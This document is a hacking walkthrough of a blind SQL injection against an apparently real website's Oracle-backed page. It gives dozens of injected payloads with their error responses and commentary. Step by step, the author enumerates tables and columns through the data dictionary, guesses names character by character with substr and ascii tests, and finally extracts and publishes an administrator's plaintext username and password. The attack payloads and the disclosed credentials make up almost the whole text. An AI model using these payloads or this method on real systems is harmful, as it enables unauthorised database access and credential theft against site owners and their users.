http://et.kpworld.com/star.asp?performer=马三立;
——————————————————
OraOLEDB error '80040e14' ORA-00911:
invalid character
/star.asp, line 83

The semicolon is not filtered by the application: ORA-00911 comes from Oracle itself, which does not accept a statement terminator inside a statement sent through OCI/OLE DB. Either way, stacked queries are not available here.

http://et.kpworld.com/star.asp?performer=马三立'
—————————————————-
OraOLEDB error '80004005' ORA-01756:
quoted string not properly terminated
/star.asp, line 83

So single quotes are not filtered: the injected quote closes the string literal in the query and Oracle complains about the now-unbalanced literal.

http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
—————————————————————-
Closing the quote again with the trailing '1 makes the page return normally. Everything below is appended to this parameter in the same way.

and 0<>(select count(*) from admin) and '1'='1
—————————————————————–
OraOLEDB error '80040e37' ORA-00942:
table or view does not exist
/star.asp, line 83

No table named ADMIN is visible to this database user (ORA-00942 is also what Oracle returns when the table exists but the current user has no privilege on it).
******************************************************************

Next we need Oracle's data dictionary views:

user_tables holds every table owned by the current user. To get a table's row count (NUM_ROWS is the figure from the last statistics gathering, not a live count):

select num_rows from user_tables where table_name='TABLE_NAME'

user_tab_columns holds every column of those tables:

select column_name from user_tab_columns where table_name='TABLE_NAME'

and 0<>(select count(*) from all_tables) and '1'='1
———————————————————————
Exists!
all_tables is a dictionary view listing every table the current user can access, its own and other users'.

and 0<>(select count(*) from user_tables) and '1'='1
———————————————————————

Returns. This view exists too; it lists the tables owned by the current user.

and 0<>(select top 1 table_name from user_tables) and '1'='1
———————————————————————————
OraOLEDB error '80040e14' ORA-00923:
FROM keyword not found where expected
/star.asp, line 83

TOP 1 not supported? That explanation did not seem convincing at first, but PINKEYES has tested it and confirmed that Oracle really does not accept TOP 1. (TOP is SQL Server syntax; the Oracle equivalent is a where rownum=1 filter.)

and 0<>(select count(*) from user_tables where table_nam<>'') and '1'='1
——————————————————————————————–

OraOLEDB error '80040e14' ORA-00904:
invalid column name /star.asp, line 83

The column name is misspelled here (table_nam), so Oracle reports ORA-00904 invalid column name. A bad identifier inside the injected condition shows up as this error rather than as a syntax error.

and 0<>(select count(*) from user_tables where table_name<>'''') and '1'='1
——————————————————————————————–

With the identifier spelled correctly the page returns normally, our success marker. Note what the four quotes actually are: '''' is a one-character string literal containing a single quote, so table_name<>'''' is true for every table. It does not mean "empty"; in Oracle the empty literal '' is NULL, and table_name<>'' would match no rows at all. Next, some function tests:

and 0<>(select count(*) from user_tables where sum(table_name)>1) and '1'='1
————————————————————————————————

OraOLEDB error '80040e14' ORA-00934:
group function is not allowed here
/star.asp, line 83
Aggregate (group) functions cannot be used in a WHERE clause.

and 0<>(select count(*) from user_tables where avg(table_name)) and '1'='1
———————————————————————————————-

OraOLEDB error '80040e14' ORA-00934:
group function is not allowed here /star.asp, line 83

Same thing: no aggregate functions in a WHERE clause.

and 0<>(select to_char(table_name) from user_tables) and%20'1'='1
————————————————————————–

OraOLEDB error '80004005' ORA-01427:
single-row subquery returns more than one row
/star.asp, line 83
The subquery is used as a scalar but returns one row per table; as a side effect the error confirms the user owns more than one table.

and 0<>(select count(*) from user_tables where table_name+1) and%20'1'='1
————————————————————————–

OraOLEDB error '80040e14' ORA-00920:
invalid relational operator
/star.asp, line 83

A WHERE clause needs a condition, not a bare expression, hence "invalid relational operator". Enough probing; now let's see how to get the table names out:

and 0<>(select count(*) from performer) and%20'1'='1
—————————————————–

Returns normally. The table name was guessed from the parameter name in the URL.

and 0<>(select count(*) from user_tables where table_name='performer') and%20'1'='1
————————————————————————————-
No normal page: failure marker.

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER') and%20'1'='1
————————————————————————————————

Success! Oracle folds unquoted identifiers to uppercase and stores them that way in the data dictionary, so comparisons against table_name and column_name have to use uppercase. (The earlier count(*) from performer worked because that identifier was unquoted and got folded too.)

and 0<>(select count(*) from user_tables where length(table_name)>10) and%20'1'='1
————————————————————————————

Use length() to find how many characters the longest table name has.

and 0<>(select count(*) from user_tables where length(table_name)=18) and%20'1'='1
————————————————————————————-

Skipping several steps (raise the >N bound until it stops returning, then confirm with =N), the longest table name is 18 characters.

and 0<>(select count(*) from user_tables where substr(table_name,1,1)='A') and%20'1'='1
—————————————————————————————–

First character is 'A'.

and 0<>(select count(*) from user_tables where substr(table_name,1,2)='AD') and%20'1'='1
—————————————————————————————–

First two characters are 'AD'.

and 0<>(select count(*) from user_tables where substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
———————————————————————————————
Skipping the rest, the 18-character table name is 'ADMINAUTHORIZATION'. (Strictly, these prefix queries should also carry length(table_name)=18, as the later ones do; without it a prefix that matches any other table also makes the page return.)

and 1=(select count(*) from user_tables where table_name='ADMINAUTHORIZATION') and%20'1'='1
——————————————————————————————–
Returns: exactly one table has that name.

and 0<>(select count(*) from user_tables where length(table_name)=2) and%20'1'='1
———————————————————————————-

The shortest table name is 2 characters.

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
————————————————————————————————-

No normal page (lowercase, see above).

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25') and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
————————————————————————————————-

All return normally, so LIKE can be used for guessing.

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8) and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
————————————————————————————————-
Combining LIKE with LENGTH pins the length down immediately: 10 characters.

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
————————————————————————————————-
The fourth character is S. From here on it is repetitive work.

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
————————————————————————————————-
Got it: 'BBSSUBJECT'.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
————————————————————————————————-

No normal page, so this does not look like the table that stores users and passwords. Try again...

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15)%20and%20'1'='1
————————————————————————————————-

Length confirmed as 15.

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)='U'%20and%20length(table_name)=15)%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)='S'%20and%20length(table_name)=15)%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)='USER'%20and%20length(table_name)=15)%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)='UNSUBSCRIBEUSER')%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name='UNSUBSCRIBEUSER')%20and%20'1'='1
————————————————————————————————-

Table name confirmed as 'UNSUBSCRIBEUSER' (a negative start position in substr counts from the end of the string, which is how the 'USER' suffix was checked). Next, guess whether it has a password column...

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25PASS%25')%20and%20'1'='1
————————————————————————————————-
LIKE '%PASS%' gives no normal page. Annoying; keep going.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25PASS%25'%20and%20length(table_name)=13)%20and%20'1'='1
————————————————————————————————-
Returns, but this is not precise: the condition is not tied to one table, so it only says that some table with a 13-character name has a column containing PASS.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)='SS') and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)='SS')%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS') and%20'1'='1
————————————————————————————————-
Using SUBSTR to narrow it down.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS'%20and%20length(column_name)=11)%20and%20'1'='1
————————————————————————————————-

The column containing PASS is 11 characters long. Since the 4 characters starting at position 4 are PASS, there are 3 characters before PASS and 4 after it, 11 in total.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)='PASSWORD')%20and%20'1'='1
————————————————————————————————-

One guess, PASSWORD, and sure enough...

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)='STRPASSWORD')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)%20and%20'1'='1
————————————————————————————————-

All return, so the password column is 'STRPASSWORD'. With the password column in hand things get easier: use it to find the table name:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13) and '1'='1
————————————————————————————————-

Returns, consistent with the 13-character table-name length found above. Use SUBSTR to get its name:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20substr(table_name,1,13)='ADMINISTRATOR') and '1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20table_name='ADMINISTRATOR') and '1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name='ADMINISTRATOR') and '1'='1
————————————————————————————————-

All return, so the table name is 'ADMINISTRATOR'.

and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR') and '1'='1
————————————————————————————————-

The table has 8 columns.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25ID%25')%20and%20'1'='1
————————————————————————————————-
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and '1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,2)='ID')%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-2,2)='ID')%20and%20'1'='1
————————————————————————————————-
There is a column containing ID (and the second query shows the table holds 3 rows). Characters 4-5 are ID and the last two characters are ID, so the column name ends in ID and is exactly 5 characters long.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-5,5)='LNGID')%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name='LNGID')%20and%20'1'='1
————————————————————————————————-
There it is: LNGID.

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20'1'='1
————————————————————————————————-
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
————————————————————————————————-
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
————————————————————————————————-
The smallest ID (8) and largest ID (21) are out. Next, the password.

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-
The password for LNGID 8 is 4 characters long.

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-
Position 1: 116 = 't'
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-
Position 2: 101 = 'e'
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-
Position 3: 115 = 's'
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-
Position 4: 116 = 't'

STRPASSWORD: test

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8)%20and%20'1'='1
————————————————————————————————-

OH YEAH, the password is out. The equality check succeeding also means it is stored in plaintext.

Now the username:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25NAME%25')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,4)='NAME')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-4,4)='NAME')%20and%20'1'='1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,1,7)='STRNAME')%20and%20'1'='1
————————————————————————————————-

There it is, the column STRNAME.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20not%20in('STRNAME','STRPASSWORD','LNGID'))%20and%20'1'='1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20'1'='1
————————————————————————————————-
The STRNAME value is 4 characters long. Surely it is not the same as the password...

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20STRNAME='test')%20and%20'1'='1
————————————————————————————————-
Heh, it is.


Table name: ADMINISTRATOR. Columns: STRNAME, STRPASSWORD, LNGID.

LNGID=8 STRNAME=test STRPASSWORD=test

